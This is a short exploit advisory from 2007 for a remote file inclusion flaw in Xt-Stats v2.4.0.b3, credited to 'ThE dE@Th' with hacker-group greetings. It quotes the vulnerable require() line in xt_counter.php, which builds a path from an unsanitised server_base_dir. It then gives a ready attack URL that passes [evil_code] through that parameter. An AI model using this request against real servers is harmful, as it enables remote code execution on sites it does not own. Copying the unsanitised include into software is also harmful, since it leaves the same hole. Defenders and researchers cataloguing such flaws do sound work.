id: 1434
date: 01/27/2007
title: Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability
author: ThE dE@Th
cves: 

=======================================================================
Xt-Stats v.2.4.0.b3 (server_base_dir) Remote File Include Vulnerability
=======================================================================



**************************************************
Finded by ThE dE@Th
*******************

Greetz For :AsB-May Team & HaCk.eGy
***********************************

xt_counter.php:
*************

require( $server_base_dir.'management/sources/counter_class.php');


http://www.site.com/[path]/xt_counter.php?server_base_dir=[evil_code]
*************************************************************



#  0day.today [2023-03-22]  #